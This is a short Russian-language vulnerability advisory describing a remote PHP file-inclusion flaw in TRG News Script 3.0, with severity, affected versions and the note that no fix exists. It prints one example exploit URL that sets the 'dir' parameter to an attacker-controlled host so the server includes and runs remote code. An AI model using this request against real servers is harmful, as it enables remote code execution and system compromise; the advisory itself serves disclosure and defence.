PHP-инклюдинг в TRG News Script

Дата публикации:
22.03.2005
Всего просмотров:
772
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
TRG News Script 3.x
Уязвимые версии: TRG News Script 3.0

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web сервера.

Уязвимость существует из-за некорректной обработки входных данных в переменной dir. Удаленный пользователь может изменить значение этой переменной на произвольный URL и выполнить одноименные сценарии на сервере. Для успешной эксплуатации уязвимости 'register_globals' и 'allow_url_fopen' должны быть включены в конфигурационном файле php на целевом сервере. Пример:

http://[target]/research/news/trg_news30 /
trgnews/install/article.php?dir=http://[attacker]

URL производителя: www.rustedgate.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: TRG News Script Include File Hole Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA